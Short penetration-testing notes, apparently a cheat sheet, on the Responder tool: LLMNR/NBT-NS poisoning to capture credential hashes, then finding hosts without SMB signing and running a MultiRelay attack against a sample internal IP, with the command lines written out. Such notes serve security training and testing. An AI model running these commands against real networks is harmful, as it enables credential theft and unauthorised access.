Responder used for

  1. LLMNR protocol
  2. NBT-NS protocol

Captures hashes and passwords from several protocols such as SMB, MSSQL, HTTP, LDAP & much more

Installation - git clone responder cd responder

responder.py -I eth0 -rf

when user tries to access wrong share name, hashesh are saved in responder.db and logs folder.

Using Responder for Multirelay attacks

cd responder/tools

TO find out which servers have SMB signing false. runfinger.py -i 192.168.1.0/24

multirelay.py -t 192.168.1.154 -u ALL

change the Responder.conf settings and make the HTTP and SMB off.

Responder.py -I eth0 -rv